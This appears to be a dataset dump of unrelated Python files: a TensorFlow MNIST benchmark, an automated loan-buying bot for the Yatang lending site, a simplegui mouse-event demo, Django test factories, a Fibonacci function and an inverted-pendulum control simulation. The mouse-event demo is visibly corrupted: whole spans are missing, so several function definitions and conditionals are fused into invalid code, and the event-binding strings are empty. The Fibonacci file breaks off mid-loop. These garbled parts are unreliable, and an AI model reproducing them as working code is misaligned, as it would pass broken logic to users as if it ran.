Count'].sum(axis=0)\n#\n#bact_phyla_names,bact_phyla_counts=list_loader(bact_indata,'phylum',nm='Bacteria')\n#arch_phyla_names,arch_phyla_counts=list_loader(arch_indata,'phylum',nm='Archaea',ks='a')\n#\n#\n#unclass_tot=unclass_indata['Seq Count'].sum(axis=0)\n#\n#tax_hist(bact_phyla_counts,nm='Bacteria')\n#tax_hist(arch_phyla_counts,nm='Archaea')\n\n\n\n#test_phyla_names,test_phyla_counts=list_loader(testdat3,'phylum',nm='Bacteria')\n\n\n\n\n\n\n\n\n\n","sub_path":"genomics/csvtofasta.py","file_name":"csvtofasta.py","file_ext":"py","file_size_in_byte":20307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"244382313","text":"# -*- coding: utf-8 -*-\n\"\"\"\n| **@created on:** 08/06/18,\n| **@author:** prathyushsp,\n| **@version:** v0.0.1\n|\n| **Description:**\n| \n|\n| **Sphinx Documentation Status:** --\n|\n..todo::\n\"\"\"\n\nimport os\nimport sys\nimport json\n\nif len(sys.argv) <= 1:\n sys.argv.append('cpu')\nUSE_GPU = True if sys.argv[1] == 'gpu' else False\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" if USE_GPU else \"\"\n\nfrom benchmark.benchmark import BenchmarkUtil\nfrom benchmark.system_monitors import CPUMonitor, MemoryMonitor, GPUMonitor\n\nbutil = BenchmarkUtil(model_name='EP11 Reinitializable_iterator_switch {}'.format(sys.argv[1]),\n stats_save_path='/tmp/stats/',\n monitors=[CPUMonitor, MemoryMonitor, GPUMonitor])\n\n\n@butil.monitor\ndef main():\n # Imports\n import tensorflow as tf\n from tensorflow.examples.tutorials.mnist import input_data\n import time\n\n # Global Variables\n EPOCH = 100\n BATCH_SIZE = 32\n DISPLAY_STEP = 1\n\n mnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\n\n # Create Dataset\n # Create Dataset\n train_features_dataset = tf.data.Dataset.from_tensor_slices(mnist.train.images)\n train_label_dataset = tf.data.Dataset.from_tensor_slices(mnist.train.labels)\n train_dataset = tf.data.Dataset.zip((train_features_dataset, train_label_dataset)).repeat(EPOCH).batch(BATCH_SIZE)\n\n # Create Valid Dataset\n valid_features_dataset = tf.data.Dataset.from_tensor_slices(mnist.test.images)\n valid_label_dataset = tf.data.Dataset.from_tensor_slices(mnist.test.labels)\n valid_dataset = tf.data.Dataset.zip((valid_features_dataset, valid_label_dataset)).batch(\n batch_size=mnist.train.num_examples)\n\n # Create Dataset Iterator\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types,\n train_dataset.output_shapes)\n\n # Create features and labels\n features, labels = iterator.get_next()\n\n # Create Initialization Op\n train_init_op = iterator.make_initializer(train_dataset)\n valid_init_op = iterator.make_initializer(valid_dataset)\n\n # Deeplearning Model\n def nn_model(features, labels):\n bn = tf.layers.batch_normalization(features)\n fc1 = tf.layers.dense(bn, 50)\n fc2 = tf.layers.dense(fc1, 50)\n fc2 = tf.layers.dropout(fc2)\n fc3 = tf.layers.dense(fc2, 10)\n loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=fc3))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.01).minimize(loss)\n return optimizer, loss\n\n # Create elements from iterator\n training_op, loss_op = nn_model(features=features, labels=labels)\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n config_proto = tf.ConfigProto(log_device_placement=True)\n config_proto.gpu_options.allow_growth = True\n start = time.time()\n with tf.train.MonitoredTrainingSession(config=config_proto) as sess:\n sess.run(init_op)\n sess.run(train_init_op)\n batch_id, epoch_id, total_batches, avg_cost = 0, 0, int(mnist.train.num_examples / BATCH_SIZE), 0\n while True:\n try:\n _, c = sess.run([training_op, loss_op])\n avg_cost += c / total_batches\n if batch_id == total_batches:\n if epoch_id % DISPLAY_STEP == 0:\n print(\"Epoch:\", '%04d' % (epoch_id + 1), \"cost={:.9f}\".format(avg_cost))\n batch_id, avg_cost, cost = 0, 0, []\n epoch_id += 1\n batch_id += 1\n except tf.errors.OutOfRangeError:\n break\n print(\"Optimization Finished!\")\n\n sess.run(valid_init_op)\n while True:\n try:\n c = sess.run(loss_op)\n avg_cost += c / total_batches\n except tf.errors.OutOfRangeError:\n break\n print(\"Validation :\", \"cost={:.9f}\".format(avg_cost))\n\n print('Total Time Elapsed: {} secs'.format(time.time() - start))\n json.dump({'internal_time': time.time() - start}, open('/tmp/time.json', 'w'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"EP11_ReInitializable_Iterator_Switch.py","file_name":"EP11_ReInitializable_Iterator_Switch.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"279826314","text":"#!/usr/bin/python3.6\n# -*- coding: utf-8 -*- \n\nfrom urllib.request import Request, install_opener,build_opener,HTTPCookieProcessor, HTTPRedirectHandler, URLError, HTTPError\nfrom urllib.parse import urlencode\nfrom math import floor\nfrom threading import Lock\n\nimport json, logging, os, sys, math, base64, socket, time\npythonpath = os.path.dirname(__file__)\npythonpath = os.path.abspath(os.path.join(pythonpath, os.pardir))\nif pythonpath is not None:\n paths = pythonpath.split(':' if os.name=='posix' else ';')\n for path in paths:\n if not path in sys.path:\n sys.path.append(path)\n\nimport yatang\nfrom modules import InvestInfo, WelfareInfo\nfrom Coupon import Coupon\nfrom Redpacket import Redpacket\nfrom Assets import Asset, Assets\nfrom utils import Encryptor\n\nlogger = logging.getLogger(\"app\")\n\nclass Invest: \n def __init__(self, name, opener, amount = None):\n self.encryptor = Encryptor()\n self.name = name #用户名\n self.opener = opener\n self.amount = amount #投资金额\n self.lock = Lock()\n\n #根据红包来确定投资金额 \n def tender(self, loan, user_info):\n logger.info(self.name + \" 开始投资资产标.\")\n ammount = int(floor(loan.available_cash)) - yatang.reserved_amount\n if(ammount > loan.minAmount):\n salt = loan.uniqKey\n ppay = self.encryptor.encryptTradePassword(base64.b64decode(user_info.trade_password).decode('utf-8'), salt)\n # coupon info\n lunchid = \"0\"\n \n couponinfo = Coupon(self.opener, loan.borrowNum).couponListRequest()\n if('data' in couponinfo and len(couponinfo['data'])):\n lunchid = couponinfo['data'][0]['id']\n ammount = couponinfo['data'][0]['user_constraint']\n else:\n logger.info(\"没有合适的红包\")\n return\n # buy\n values = {\n '__hash__': loan.__hash__,\n 'ibnum': loan.borrowNum,\n 'lunchId': lunchid, # 红包ID\n 'amount': ammount,\n 'p_pay': ppay,\n 'user_id': user_info.user_id\n }\n buyinfo = self.buyRequest(values)\n if('tnum' in buyinfo):\n self.tender_info(loan.borrowNum, buyinfo['tnum'])\n import uuid\n invest = InvestInfo(id=str(uuid.uuid1()), \n name=loan.uid,\n amount = 100)\n session = yatang.Session()\n session.add(invest)\n session.commit()\n \n pass \n \n #用户的可投金额来投资\n def tenderWF(self, welfare, user_info):\n if welfare == None:\n logger.warn(\"无效的开心利是信息\")\n return\n logger.debug(self.name +\" 准备投开心利是:\" + str(welfare.available_cash))\n\n if(welfare.available_cash > welfare.zxtbe):\n logger.info(self.name +\" 开始投开心利是:\" + str(welfare.available_cash)+ \":\" + welfare.uniqKey)\n salt = welfare.uniqKey\n ppay = self.encryptor.encryptTradePassword(base64.b64decode(user_info.trade_password).decode('utf-8'), salt)\n # buy 秒标\n values = {\n '__hash__': welfare.hash_value,\n 'ibnum': welfare.borrowNum,\n 'lunchId': '0', # 红包ID\n 'amount': int(math.floor(welfare.available_cash)),\n 'p_pay': ppay,\n 'user_id': user_info.user_id\n }\n for i in range(10):\n buyinfo = self.buyRequest(values)\n logger.info(\"标的购买结果:%s\" % str(buyinfo))\n if buyinfo and 'status' in buyinfo:\n if int(buyinfo['status']) == 119:\n break\n \n time.sleep(0.5)\n \n if buyinfo and 'tnum' in buyinfo:\n with self.lock:\n session = yatang.Session()\n query = session.query(WelfareInfo).filter(WelfareInfo.ibid == welfare.ibid)\n if query.count() == 0:\n welfare_info = WelfareInfo.fromWelfare(welfare)\n session.add(welfare_info)\n session.commit()\n tenderInfo = self.tender_info(welfare.borrowNum, buyinfo['tnum'])\n logger.info(\"标的购买信息:%s\" % str(tenderInfo))\n \n pass\n \n #用户决定投资金额\n def tenderCF(self, crowdfunding, user_info, useRedPacket):\n logger.debug(self.name +\" 准备投资众筹\" )\n lunchid = \"0\"\n redpacket = Redpacket(self.opener, crowdfunding.project_id).redpacketListRequest(self.amount)\n if(redpacket and redpacket['status'] == 1) :\n if('data' in redpacket and len(redpacket['data'])):\n found = list(filter(lambda d : d['user_constraint'] == self.amount, redpacket['data']))\n if found and len(found) > 0:\n lunchid = found[0]['id']\n if lunchid == '0':\n logger.info(\"没有合适的红包\")\n if useRedPacket:\n return\n logger.debug(\"%s 开始投资众筹 %s\" % (self.name, crowdfunding))\n salt = crowdfunding.uniqKey\n ppay = self.encryptor.encryptTradePassword(base64.b64decode(user_info.trade_password).decode('utf-8'), salt)\n #重试\n for i in range(2):\n values = {\n '__hash__': crowdfunding.hash_value,\n 'id': crowdfunding.project_id,\n 'lunchId': lunchid, # 红包ID\n 'amount': self.amount,\n 'p_pay': ppay,\n 'vcode': ''\n }\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + '/Crowdfunding/checkPay', data.encode(encoding='UTF8'), headers)\n jsonresp = {}\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200 :\n resp_data =response.read().decode(encoding='UTF8')\n jsonresp = json.loads(resp_data)\n logger.info('%s 购买众筹结果:%s' % (self.name, jsonresp))\n if jsonresp and 'status' in jsonresp:\n if int(jsonresp['status']) == 119:\n break\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError: \n logger.warn(\"无效的json格式\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n logger.info(\"标的购买结果:\" + str(jsonresp))\n time.sleep(0.5)\n pass\n \n def buyRequest(self, values):\n logging.info('开始购买标的:' + str(values['amount']))\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + '/Invest/checkppay', data.encode(encoding='UTF8'), headers)\n jsonresp = {}\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200 :\n resp_data =response.read().decode()\n jsonresp = json.loads(resp_data)\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError: \n logger.warn(\"无效的json格式\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n return jsonresp\n\n def tender_info(self, borrow_num, tnum):\n values = {\n 'borrow_num':borrow_num,\n 'tnum': tnum\n }\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + 'Public/tenderinfo', data.encode(encoding='UTF8'), headers)\n jsonresp = {}\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200 :\n resp_data =response.read().decode()\n jsonresp = json.loads(resp_data)\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError:\n logger.warn(\"无效的json格式\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n return jsonresp\n \n def investListRequest(self, typeList=[5]):\n values = {\n 'mode':1,\n 'tpage[page]':1,\n 'tpage[size]':20\n }\n data = urlencode(values)\n headers = {\n 'User-Agent': yatang.YT_USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'\n }\n req = Request(yatang.YTURLBASESSL + 'index.php?s=/Invest/GetBorrowlist', data.encode(encoding='UTF8'), headers)\n aList = []\n try:\n response = self.opener.open(req, timeout=30)\n if response.code == 200:\n resp_data = response.read().decode()\n jsonresp = json.loads(resp_data)\n\n if(len(typeList) and jsonresp):\n for loan in jsonresp['data']['Rows']:\n bt = int(loan['borrow_type'])\n if bt in typeList:\n if bt in [1, 9] and int(loan[\"time_limit\"]) == 3:\n aList.append(loan)\n else:\n aList.append(loan)\n else:\n if jsonresp:\n aList = jsonresp['data']['Rows']\n except URLError as e:\n logger.warn(e)\n except HTTPError as h:\n logger.warn(h)\n except socket.timeout as t:\n logger.warn(t)\n except ValueError:\n logger.warn(\"data was not valid JSON\")\n logger.warn(resp_data)\n except:\n print (\"Unexpected error:\", sys.exc_info()[0])\n logging.getLogger(\"app\").warn('Unexpected error:', sys.exc_info()[0])\n \n return aList\n\nif __name__ == '__main__':\n\n from Cookies import Cookies\n from Account import Account\n from Loan import Loan\n c = Cookies()\n cj = c.readCookie('emmaye')\n #c.dumpCookies(cj)\n opener = build_opener(HTTPCookieProcessor(cj), HTTPRedirectHandler())\n install_opener(opener)\n\n acc = Account(opener)\n accountinfo = acc.accountRequest()\n totalAmount = accountinfo.available\n\n #i = Invest('emmaye', opener)\n #i.investListRequest()\n\n assets = Assets(opener)\n assetList = []\n idx = 1\n while len(assetList) < 10:\n assetList.extend(assets.assetRequest(str(idx)))\n idx += idx\n\n print(assetList)\n\n for asset in assetList:\n print(asset)\n loan = Loan.loanRequest(opener, asset)\n coupon = Coupon(opener, loan.borrowNum)\n print(coupon.couponListRequest())\n pass","sub_path":"python3/yatang/Invest.py","file_name":"Invest.py","file_ext":"py","file_size_in_byte":12298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"148169080","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# mouseEventExample.py\n\n#\n# Copyright 2014 William Sebastian Martinez Bas \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n#\n\n\n# To hide debug info (key pressed and mouse event), touch NODBG\n# For no cursor, touch NOCURS\n# To hide Control Area, touch NOCTRL (only if you do not use control area labels and buttons)\n\nimport time;\nfrom math import *;\n\n\ntry:\n\timport simpleguitk as simplegui;\n\tEscape='escape';\n\tcompenso=.9;\nexcept:\n\timport simplegui;\n\tEscape=27;\n\tcompenso=1;\n\n\n\n\n\nfalse=False;\ntrue=True;\ncursor=false;\nevento=false;\nlgr=1;\n#pseudoconstants and not-dependent variables\npulsos=5;\n\noutMessage=\"Come back soon!!! Bye!!!\";\nWIDTH=800;\nHEIGHT=400;\nSpace=32;\nEnter=13;\nBackspace=8;\nconv=pi/180\ncharSize=17;\nfontSize=charSize;\nxi=0;yi=1;\nxf=2;yf=3;\nx=0;y=1;\n\ngoIn=\"getMouseFocus\";goOver=\"mouseOver\";goOut=\"lostMouseFocus\";\nEventos=[goIn, goOver, goOut];\nExit=\"Exit\";Off=Exit;\nAddField=\"Add Field\";\nAddLabel=\"Add Label\";\nAddButton=\"Add Button\";\n#Arrays\nButtons=[Exit,False,\n\t\t AddField,False,\n\t\t AddLabel,False,\n\t\t AddButton,False,\n\t\t False,False];\n\n#program variables\ntop=10;\nlft=10;\nrow=5;\nlines=5;\nbuttonsPerLine=2;\nrecentClick=0;\nselected='_';\n\n\ndef isset(variable):\n\ttry:\n\t\treturn (variable in locals() or variable in globals());\n\texcept:\n\t\treturn(false);\n\n#generalIsimas purpose functions\ndef major(a,b): return (a if a>b else b);\ndef minor(a,b): return (a if am and a>4):\n\t\t\ta-=1;\n\t\t#(y1-y0)/3\n\telse:\n\t\ta=charSize;\n\n\ttext=txt;\n\tdx=abs(x1-x0-a/2);\n\twhile (frame.get_canvas_textwidth(text, a*compenso)>dx):\n\t\ttext=text[:-1];\n\n\tcentrox=(x1+x0-e)/2; centroy=(y1+y0)/2;\n\tcentra=abs(centrox-frame.get_canvas_textwidth(text, a*compenso)/2);\n\tcanvas.draw_text(text, [centra+e/2,centroy+e], a*compenso, front);\n\ndef screener(canvas,l=0,t=0,w=100,h=50,txt=\"test\"):\n\tbutton(canvas,l,t,w,h,txt,'#e34','FloralWhite', 6);\ndef screenerDisabled(canvas,l=0,t=0,w=100,h=50,txt=\"test\"):\n\tbutton(canvas,l,t,w,h,txt,'#AAA','#ccc',5,\"#ccc\");\ndef buttonNotPressed(canvas,l=0,t=0,w=100,h=50,txt=\"test\",charSize=-1):\n\tbutton(canvas,l,t,w,h,txt,'#EFF','#AAA',5,\"#ccc\",charSize);\ndef buttonPressed(canvas,l=0,t=0,w=100,h=50,txt=\"test\",charSize=-1):\n\tbutton(canvas,l,t,w,h,txt,\"#AAA\",'#222',5,\"#333\",charSize);\ndef buttonSelected(canvas,l=0,t=0,w=100,h=50,txt=\"test\",charSize=-1):\n\tglobal lgr;\n\te=5;\n\tbutton(canvas,l,t,w,h,txt,'#EFF','#AAA',e);\n\tu=lgr; lgr=5; rectangle(canvas,l,t,l+w,t+h,'#E00','None');lgr=u;\n\n\n#this app functions\n\ndef draw_handler(canvas):\n\tglobal charSize,recentClick,selected,flu,cursor,evento;\n\n\t#an.draw_circle((CX, CY), 145, 5, \"#A9A9A9\", \"#A9A9A9\");\n\t#an.draw_circle((CX, CY), 180, 5, \"Black\",'#FAFAD2');\n\tcl=10;#crux large\n\tcc=4;#crux center\n\t#canvas.draw_line((10, 20), (30, 40), 12, 'Red');\n\tcanvas.draw_oval([(1, 20),(50, 40)], 2, 'Red', fill_color=None);\n\n\ttry:\n\t\tflu;\n\texcept:\n\t\tflu=0;\n\n\t#Buttons\n\ti=0;\n\tflet=0;\n\tnobut=false;\n\tfor f in range(0,lines):\n\t\tfor g in range(0,buttonsPerLine):\n\t\t\tif (Buttons[i]!=False and\n\t\t\t\tButtons[i]!=True and\n\t\t\t\ttype(pB[i])==type([1,2,3,4,5])\n\t\t\t\t):\n\t\t\t\tif (selected==Buttons[i] and\n\t\t\t\t\t recentClick>0):\n\t\t\t\t\t\tbuttonPressed(canvas,\n\t\t\t\t\t\t\t\t\t pB[i][xi],\n\t\t\t\t\t\t\t\t\t pB[i][yi],\n\t\t\t\t\t\t\t\t\t pB[i][xf],\n\t\t\t\t\t\t\t\t\t pB[i][yf],\n\t\t\t\t\t\t\t\t\t Buttons[i],\n\t\t\t\t\t\t\t\t\t charSize*.66);\n\t\t\t\t\t\tif Buttons[i]==Off:\n\t\t\t\t\t\t\tif recentClick<=1:\n\t\t\t\t\t\t\t\texit(outMessage);\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tflet=1;\n\t\t\t\telse:\n\t\t\t\t\t\tbuttonNotPressed(canvas,\n\t\t\t\t\t\t\t\t\t\t pB[i][xi],\n\t\t\t\t\t\t\t\t\t\t pB[i][yi],\n\t\t\t\t\t\t\t\t\t\t pB[i][xf],\n\t\t\t\t\t\t\t\t\t\t pB[i][yf],\n\t\t\t\t\t\t\t\t\t\t Buttons[i],\n\t\t\t\t\t\t\t\t\t\t charSize);\n\n\t\t\ti+=1;\n\t\t\tif flet==1:\n\t\t\t\tcanvas.draw_text(outMessage,[(CX-frame.get_canvas_textwidth(outMessage,charSize)),CY],40, \"#f00\", \"monospace\");\n\t\t\t\tif (flu==0):\n\t\t\t\t\tflu=seconds;\n\t\t\t\telif (seconds>flu+2):\n\t\t\t\t\texit(outMessage);\n\n\t#recuadro overbutton\n\tlast=i;\n\ti=0;\n\tfor f in range(0,lines):\n\t\tfor g in range(0,buttonsPerLine):\n\t\t\tif (Buttons[i]!=False and\n\t\t\t\tButtons[i]!=True and\n\t\t\t\ttype(pB[i])==type([1,2,3,4,5])\n\t\t\t\t):\n\t\t\t\tp=pB[i];i+=1;\n\n\t\t\t\tif ( len(p)>=5 and cursor and\n\t\t\t\tcursor[x]>=p[xi] and\n\t\t\t\tcursor[x]<=p[xf] and\n\t\t\t\tcursor[y]>=p[yi] and\n\t\t\t\tcursor[y]<=p[yf]):\n\t\t\t\t\trectangle(\n\t\t\t\t\t\tcanvas,\n\t\t\t\t\t\t(p[xi], p[yi]),\n\t\t\t\t\t\t(p[xf], p[yf]),\n\t\t\t\t\t\t'#538457');\n\n\n\tif recentClick<=1:\n\t\tselected=' ';\n\n\n\t#Cursor\n\tif (cursor):\n\t\tif (evento==goOver):\n\t\t\tcircle(canvas,(cursor[x],cursor[y]), 20, \"#538457\");\n\t\t\tline(canvas,(cursor[x]-cl-cc,cursor[y]),(cursor[x]-cc,cursor[y]), \"#538457\");\n\t\t\tline(canvas,(cursor[x]+cc,cursor[y]),(cursor[x]+cl+cc,cursor[y]), \"#538457\");\n\t\t\tline(canvas,(cursor[x],cursor[y]-cl-cc),(cursor[x],cursor[y]-cc), \"#538457\");\n\t\t\tline(canvas,(cursor[x],cursor[y]+cc),(cursor[x],cursor[y]+cl+cc), \"#538457\");\n\t\telif (evento==goOut):\n\t\t\tline(canvas,(cursor[x]-cl-cc,cursor[y]-cl-cc),(cursor[x]-cc,cursor[y]-cc), \"#754835\");\n\t\t\tline(canvas,(cursor[x]+cc,cursor[y]+cc),(cursor[x]+cl+cc,cursor[y]+cl+cc), \"#754835\");\n\t\t\tline(canvas,(cursor[x]+cl+cc,cursor[y]-cl-cc),(cursor[x]+cc,cursor[y]-cc), \"#754835\");\n\t\t\tline(canvas,(cursor[x]-cc,cursor[y]+cc),(cursor[x]-cl-cc,cursor[y]+cl+cc), \"#754835\");\n\n\n\n\ndef tecla(key):\n\tglobal selected,recentClick;\n\tif(key==Escape):\n\t\tselected=Exit;\n\t\trecentClick=pulsos;\n\ndef raton(position):\n\tglobal selected,recentClick;\n\tpx=position[0];\n\tpy=position[1];\n\ti=0;\n\tfor f in range(0,lines):\n\t\tfor g in range(0,buttonsPerLine):\n\t\t\tif (i(keyHeight-row):\n\t\t\t\t\tcara-=16;\n\t\t\t\t\tpB[i]=[\n\t\t\t\t\tlft+g*(keyWidth+row),\n\t\t\t\t\tHEIGHT-keyHeight-top-(f*(keyHeight+row))-ajusty,\n\t\t\t\t\tkeyWidth+ajustx,\n\t\t\t\t\tkeyHeight+ajusty,\n\t\t\t\t\tcara\n\t\t\t\t\t];\n\t\ti+=1;\n\n\n\ndef timex():\n\tglobal seconds;\n\ttry: seconds+=1;\n\texcept: seconds=0;\n\ndef ratonapretado(position):\n\tglobal selected,recentClick;\n\tprint(position);\n\n\nframe = simplegui.create_frame('Start', WIDTH, HEIGHT);\nframe.set_canvas_background(\"FloralWhite\");\nframe.set_mouseclick_handler(raton);\n\nframe.set_keydown_handler(tecla);\nframe.set_draw_handler(draw_handler);\ncan=frame._canvas._get_widget();\n\n\ndef enterB(event):\n\tglobal cursor,evento;\n\tcursor=(event.x, event.y);\n\tevento=goIn;\n\n\ndef leaveB(event):\n\tglobal cursor,evento;\n\tcursor=(event.x, event.y);\n\tevento=goOut;\n\ndef overB(event):\n\tglobal cursor,evento;\n\tcursor=(event.x, event.y);\n\tevento=goOver;\n\n\n\n'''\n{ 2: \"KeyPress\",\n 3: \"KeyRelease\",\n 4: \"ButtonPress\",\n 5: \"ButtonRelease\",\n 6: \"Motion\",\n 7: \"Enter\",\n 8: \"Leave\",\n 9: \"FocusIn\",\n 10: \"FocusOut\",\n 12: \"Expose\",\n 15: \"Visibility\",\n 17: \"Destroy\",\n 18: \"Unmap\",\n 19: \"Map\",\n 21: \"Reparent\",\n 22: \"Configure\",\n 24: \"Gravity\",\n 26: \"Circulate\",\n 28: \"Property\",\n 32: \"Colormap\",\n 36: \"Activate\",\n 37: \"Deactivate\",\n 38: \"MouseWheel\"\n}\n'''\ncan.bind('', enterB);\ncan.bind('', leaveB);\ncan.bind('', overB);\n\ntimer = simplegui.create_timer(500, timex);\ntimer.start();\n\n\nprint('\\033[1;37m');\n\nframe.start();\n","sub_path":"mouseEventExample.py","file_name":"mouseEventExample.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"719701","text":"import factory\n\nfrom flicks.users.tests import UserFactory\nfrom flicks.videos import models\n\n\nclass Video2013Factory(factory.DjangoModelFactory):\n FACTORY_FOR = models.Video\n\n user = factory.SubFactory(UserFactory)\n title = 'Test title'\n description = 'Test desc'\n vimeo_id = factory.Sequence(lambda n: int(n))\n filename = factory.Sequence(lambda n: '{0}.mp4'.format(n))\n\n @factory.post_generation\n def vote_count(self, create, extracted, **kwargs):\n if create and extracted:\n for k in range(extracted):\n models.Vote.objects.create(video=self,\n user=UserFactory.create())\nVideoFactory = Video2013Factory\n\n\nclass Video2012Factory(factory.DjangoModelFactory):\n FACTORY_FOR = models.Video2012\n\n title = 'Test'\n description = 'Test description'\n category = 'test'\n region = 'test'\n upload_url = 'http://example.com'\n shortlink = 'test_shortlink'\n state = 'complete'\n votes = 0\n","sub_path":"flicks/videos/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"79656424","text":"def fibonacci(n):\n a=0\n b=1\n count=0\n if n<0:\n return 'not possible'\n elif n==0:\n return 0\n elif n==1:\n return 1\n else:\n while count\n# Current Version Modified by Kuroba for Robotics II HW \n\nfrom scipy.integrate import odeint\nimport numpy as np\nimport math\nimport sys\n\n# import original modules\nimport video_InvertedPendulum as vip\n\nm_th = 0.10#1.0 # mass theta [kg]\nm_x = 0.50#2.0 # mass x [kg]\nI = 0.01#0.00558389#1.0 # inertia 1 [kg m^2]\nl_g = 0.5 # length of pendulum [m]\ng = 9.80665 # gravitational accelaration[m/s^2]\n\n#K_p = float(sys.argv[1])#-100.0\n#K_v = float(sys.argv[2])#-89.6\n\ntheta_d = 0.0\ndtheta_d = 0.0\n\nparams = [m_th, m_x, I, l_g, g] # parameters\n\ntargets = [theta_d, dtheta_d] # targets\n\n# initial conditions(x0, dx0)\nmax_t = 5.0 # max_time [s]\ndt = 0.01 # dt [s]\n\nalpha = (I*(m_x+m_th))/(m_th*l_g) + m_x*l_g\nbeta = (m_x + m_th)*g\n\nK_p = 15\nK_v = 1\n\ngains = [K_p, K_v] # gains\n\nif K_v*K_v - 4*alpha*(K_p-beta) < 0:\n s1_re = -K_v/(2*alpha)\n s2_re = -K_v/(2*alpha)\n\n s1_im = math.sqrt(-(K_v*K_v - 4*alpha*(K_p-beta)))/(2*alpha)\n s2_im = -math.sqrt(-(K_v*K_v - 4*alpha*(K_p-beta)))/(2*alpha)\nelse:\n s1_re = -K_v/(2*alpha) + math.sqrt(K_v*K_v - 4*alpha*(K_p-beta))/(2*alpha)\n s2_re = -K_v/(2*alpha) - math.sqrt(K_v*K_v - 4*alpha*(K_p-beta))/(2*alpha)\n\n s1_im = 0.0\n s2_im = 0.0\n\n#S = [math.sqrt(beta/alpha), 0] # Poles of the system (no inputs)\nS = [s1_re, s1_im, s2_re, s2_im] # Poles of the system (no inputs)\n\nsqr = 4*alpha*(K_p-beta)\nif sqr < 0:\n sqr = -sqr\n\nprint('alpha={},beta={}'.format(alpha, beta))\nprint('K_v^2={}, 4alpha(K_p+beta)={}, sqr={}'.format(K_v*K_v,4*alpha*(K_p-beta), math.sqrt(sqr)))\n\n\ndef Control(p):\n x, dx, theta, dtheta = p\n\n out = - K_p*(theta_d-theta) - K_v*(dtheta_d-dtheta)\n\n return out\n\ndef InvertedPendulum(p, t):\n x, dx, theta, dtheta = p\n\n if theta > math.pi:\n theta = theta - 2*math.pi\n elif theta < -math.pi:\n theta = theta + 2*math.pi\n\n M_11 = m_x + m_th\n M_12 = m_th*l_g*math.cos(theta)\n M_21 = m_th*l_g*math.cos(theta)\n M_22 = I + m_th*l_g*l_g\n\n #define matrix\n M = np.matrix([[M_11, M_12],[M_21, M_22]])\n N = np.matrix([[-m_th*l_g*math.sin(theta)*dtheta*dtheta],[0]])\n G = np.matrix([[0],[-m_th*g*l_g*math.sin(theta)]])\n F = np.matrix([[Control(p)],[0]])\n\n IM = np.linalg.inv(M) # calc Inverse matrix\n A = (-1)*IM.dot(N+G-F) # F is right hand side of equations\n\n ddx, ddtheta = A\n\n return [dx, ddx, dtheta, ddtheta]\n\n\nt = np.arange(0.0, max_t, dt)\nx0 = [0.0, 0.0, 0.35*math.pi, 0.0]\np = odeint(InvertedPendulum, x0, t)\n\nvip.video(p, dt, max_t, params, gains, targets, S)\n","sub_path":"PythonRoboticsDay10_Control2/HW/Script/InvertedPendulum_odeint_Underdamped.py","file_name":"InvertedPendulum_odeint_Underdamped.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"101293817","text":"# b되기 위한 최솟값 0\n# ba되기 위한 최솟값 b/a(b없음->0), ba -> 1\n# ban되기 위한 최솟값 b/a/n(b없음->0), ba/n -> 2, ban -> 0\n# bana되기 위한 최솟값 ba/na -> 2, ban(2)/a(1) -> 